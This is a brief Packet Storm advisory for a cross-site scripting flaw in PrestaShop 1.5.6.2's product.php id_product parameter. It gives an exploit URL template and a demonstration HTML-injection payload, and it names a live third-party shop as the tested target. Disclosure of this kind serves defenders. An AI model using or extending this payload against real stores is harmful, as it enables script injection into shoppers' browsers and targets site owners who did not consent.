PrestaShop 1.5.6.2 Cross Site Scripting

2014-04-12T00:00:00
ID PACKETSTORM:126137
Type packetstorm
Reporter Renzi
Modified 2014-04-12T00:00:00

Description

                                        
                                            `# Cross Site Scripting on E-Commerce PrestaShop  
# Risk: Low  
# CWE number: CWE-79  
# Date: 09/04/2014  
# Vendor: www.prestashop.com  
# Version: PrestaShop 1.5.6.2  
# Author: Felipe "Renzi" Gabriel  
# Contact: renzi@linuxmail.org  
# Tested on Windows 8 pro  
# Vulnerable File: product.php  
# Exploit: http:/host//product.php%3fid_product=[xss]  
# PoC:  
- Target: www.serviezenenmeer.nl  
- Vuln. File: product.php%3fid_product=  
- Exploit: "><marquee>Vulnerable</marquee>  
  
  
`